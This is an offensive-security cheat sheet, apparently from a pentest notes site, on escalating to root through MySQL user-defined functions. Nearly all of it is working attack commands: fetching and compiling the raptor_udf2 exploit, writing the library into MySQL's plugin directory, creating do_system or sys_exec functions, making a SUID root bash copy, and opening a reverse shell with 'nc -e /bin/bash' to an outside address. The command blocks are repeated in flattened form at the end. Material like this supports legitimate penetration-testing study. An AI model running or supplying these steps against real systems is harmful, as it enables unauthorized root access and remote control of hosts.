MYSQL

PrivEsc with MySQL User Defined Functions

Mysql service is running with root privileges. (ps aux | grep mysql)
You know root's password. (Database config files or no password for root)
If you can not access bash(or similar) shell, you can upload library as hex format. You can find this way in the subpage.

Reference: https://redteamnation.com/mysql-user-defined-functions/

In this way, we will assume you have shell access on the machine. Steps are:

Download UDF library source code
Compile it on the machine
Connect the database
Create new function for code execution
Voila!

$ mkdir /tmp/test && cd /tmp/test
$ wget http://0xdeadbeef.info/exploits/raptor_udf2.c

$ gcc -g -c raptor_udf2.c -fPIC
$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

mysql -u root -p
mysql> use mysql;
mysql> create table foo(line blob);
mysql> insert into foo values(load_file('/tmp/test/raptor_udf2.so'));
# Look for the value of plugin_dir
mysql> show variables like '%plugin%';
mysql> select * from foo into dumpfile '{plugin_directory}raptor_udf2.so';
mysql> create function do_system returns integer soname 'raptor_udf2.so';
mysql> select * from mysql.func;
+-----------+-----+----------------+----------+
| name      | ret | dl             | type     |
+-----------+-----+----------------+----------+
| do_system |   2 | raptor_udf2.so | function | 
+-----------+-----+----------------+----------+
1 row in set (0.00 sec)

mysql> select do_system('cp /bin/bash /tmp/test/rootbash; chmod +xs /tmp/test/rootbash');

If you have no chance to compile it and the machine's arch is x86_64, you can use precompiled binary to create function.

$ cp /usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.so .

mysql -u root -p
mysql> use mysql;
mysql> create table foo(line blob);
mysql> insert into foo values(load_file('/tmp/test/lib_mysqludf_sys_64.so'));
# Look for the value of plugin_dir
mysql> show variables like '%plugin%';
mysql> select * from foo into dumpfile '{plugin_directory}lib_mysqludf_sys_64.so';
mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so';
mysql> select * from mysql.func;
+----------+-----+------------------------+----------+
| name     | ret | dl                     | type     |
+----------+-----+------------------------+----------+
| sys_exec |   2 | lib_mysqludf_sys_64.so | function |
+----------+-----+------------------------+----------+
1 row in set (0.00 sec)

mysql> select sys_exec('nc -e /bin/bash 192.168.1.1 80');

PreviousKernel Exploits NextHEX

Last updated 3 years ago

$ mkdir /tmp/test && cd /tmp/test $ wget http://0xdeadbeef.info/exploits/raptor_udf2.c $ gcc -g -c raptor_udf2.c -fPIC $ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc mysql -u root -p mysql> use mysql; mysql> create table foo(line blob); mysql> insert into foo values(load_file('/tmp/test/raptor_udf2.so')); # Look for the value of plugin_dir mysql> show variables like '%plugin%'; mysql> select * from foo into dumpfile '{plugin_directory}raptor_udf2.so'; mysql> create function do_system returns integer soname 'raptor_udf2.so'; mysql> select * from mysql.func; +-----------+-----+----------------+----------+ | name | ret | dl | type | +-----------+-----+----------------+----------+ | do_system | 2 | raptor_udf2.so | function | +-----------+-----+----------------+----------+ 1 row in set (0.00 sec) mysql> select do_system('cp /bin/bash /tmp/test/rootbash; chmod +xs /tmp/test/rootbash');

$ cp /usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.so . mysql -u root -p mysql> use mysql; mysql> create table foo(line blob); mysql> insert into foo values(load_file('/tmp/test/lib_mysqludf_sys_64.so')); # Look for the value of plugin_dir mysql> show variables like '%plugin%'; mysql> select * from foo into dumpfile '{plugin_directory}lib_mysqludf_sys_64.so'; mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so'; mysql> select * from mysql.func; +----------+-----+------------------------+----------+ | name | ret | dl | type | +----------+-----+------------------------+----------+ | sys_exec | 2 | lib_mysqludf_sys_64.so | function | +----------+-----+------------------------+----------+ 1 row in set (0.00 sec) mysql> select sys_exec('nc -e /bin/bash 192.168.1.1 80');